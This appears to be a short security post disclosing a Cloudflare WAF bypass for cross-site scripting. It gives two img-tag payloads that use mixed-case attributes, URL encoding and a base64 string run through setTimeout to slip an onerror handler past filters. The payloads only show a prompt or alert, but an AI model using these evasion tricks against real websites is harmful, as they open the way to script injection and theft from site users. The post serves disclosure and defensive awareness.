A Cloudflare WAF bypass for XSS vulnerability has been discovered. The bypass combines simple (but efficient) tricks to evade filters and obfuscation. Payload examples include an image tag with attributes to trigger an XSS attack. This payload can execute malicious code when the WAF's filters fail to detect the threat. Security teams should be aware of this bypass and strengthen their defenses to mitigate such attacks. #Cloudflare #WAF #Bypass #XSS
A Cloudflare WAF bypass combining simple (but efficient) tricks
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>
A payload with some obfuscation & filter evasion tricks
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>#CF #WAF #Bypass #Payload
— Yetixx (@CyberYetixx) August 21, 2024